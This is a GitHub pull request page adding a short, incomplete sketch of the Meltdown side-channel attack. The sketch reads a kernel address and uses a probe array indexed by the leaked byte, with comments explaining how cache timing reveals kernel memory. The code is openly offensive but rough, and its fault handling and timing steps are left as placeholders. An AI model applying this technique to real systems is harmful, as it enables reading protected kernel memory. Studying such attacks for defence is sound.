Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Side channel used to access the Kernel #21

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Side channel used to access the Kernel #21

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
11 changes: 11 additions & 0 deletions Meltdown-Exploit-Rough-Code
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
uint8_t* probe_array = new uint8_t[256 * 4096];
uint8_t kernel_memory = *(uint8_t*)(kernel_address);
uint64_t final_kernel_memory = kernel_memory * 4096;
uint8_t dummy = probe_array[final_kernel_memory];
//..Find Page Fault
//... Find which of 256 slots in probe_array is cached.

/* "Probe Array is used as a side channel to retrieve data from the kernel. Step 3-5 is executed in the CPU's pipeline
before the fault is raised, due to kernel memory being accessed. The attacker uses OS functionality to trap the faulting instruction &
continues execution. The location which is substantially faster in terms of being loaded by the CPU into the cache is the
value of the byte in kernel memory"*/